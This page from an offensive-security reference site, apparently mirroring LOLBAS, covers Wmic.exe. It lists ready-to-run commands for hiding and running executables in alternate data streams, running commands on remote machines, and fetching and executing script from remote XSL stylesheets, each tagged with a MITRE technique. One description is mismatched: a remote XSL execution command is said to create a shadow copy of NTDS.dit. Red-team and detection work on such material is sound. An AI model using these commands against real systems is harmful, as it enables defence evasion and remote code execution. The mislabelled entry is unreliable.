🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / Wmic.exe

Wmic.exe

The WMI command-line (WMIC) utility provides a command-line interface for WMI

ADS

Execute binary file hidden in Alternate data streams to evade defensive counter measures

wmic.exe process call create "{PATH_ABSOLUTE}:program.exe"

Execute a .EXE file stored as an Alternate Data Stream (ADS) — MITRE: T1564.004 — Privileges: User

Copy

Copy file.

wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe"

Copy file from source to destination. — MITRE: T1105 — Privileges: User

Execute

Execute binary from wmic to evade defensive counter measures

wmic.exe process call create "{CMD}"

Execute calc from wmic — MITRE: T1218 — Privileges: User

Execute binary on a remote system

wmic.exe /node:"192.168.0.1" process call create "{CMD}"

Execute evil.exe on the remote system. — MITRE: T1218 — Privileges: User

Execute binary on remote system

wmic.exe process get brief /format:"{REMOTEURL:.xsl}"

Create a volume shadow copy of NTDS.dit that can be copied. — MITRE: T1218 — Privileges: User

Execute script from remote system

wmic.exe process get brief /format:"{PATH_SMB:.xsl}"

Executes JScript or VBScript embedded in the target remote XSL stylsheet. — MITRE: T1218 — Privileges: User